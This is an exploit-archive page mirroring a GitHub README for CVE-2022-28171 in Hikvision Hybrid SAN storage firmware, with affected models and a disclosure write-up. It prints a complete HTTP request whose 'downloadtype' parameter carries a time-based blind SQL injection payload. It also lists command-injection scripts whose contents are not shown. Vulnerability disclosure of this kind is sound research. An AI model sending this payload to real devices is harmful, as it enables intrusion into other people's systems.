Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-28171 PoC — Hikvision Hybrid SAN/Cluster Storage 命令注入漏洞

Source
https://github.com/Sapphire2017/CVE-2022-28171-POC
Associated Vulnerability
Title:Hikvision Hybrid SAN/Cluster Storage 命令注入漏洞 (CVE-2022-28171)
Description:Hikvision Hybrid SAN/Cluster Storage Products是中国海康威视(Hikvision)公司的一系列经济可靠的混合 SAN(存储区域网络)产品。 Hikvision Hybrid SAN/Cluster Storage 存在安全漏洞,该漏洞源于 web 模块输入验证不足。攻击者利用该漏洞通过发送带有恶意命令的消息来执行受限命令。
Readme
# CVE-2022-28171-POC

I originally published this on ExploitDB, which you can find at https://www.exploit-db.com/exploits/51607

### Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

```
# Date: 16  July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
```
### Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution, which was possible to execute arbitrary operating system commands and more.

### Vulnerability description
 The manual test confirmed that The "downloadtype" parameter was vulnerable to Blind SQL injection and Command Injection.
I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. 

### Request Body
```
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
```
File Snapshot

 [4.0K]  /data/pocs/3eb39296d6a4a9e53244528bd47e58b73b308897
├── [1.7K]  BlindSQL_Injection.py.md
├── [1.9K]  Command Injection.py.md
└── [1.9K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.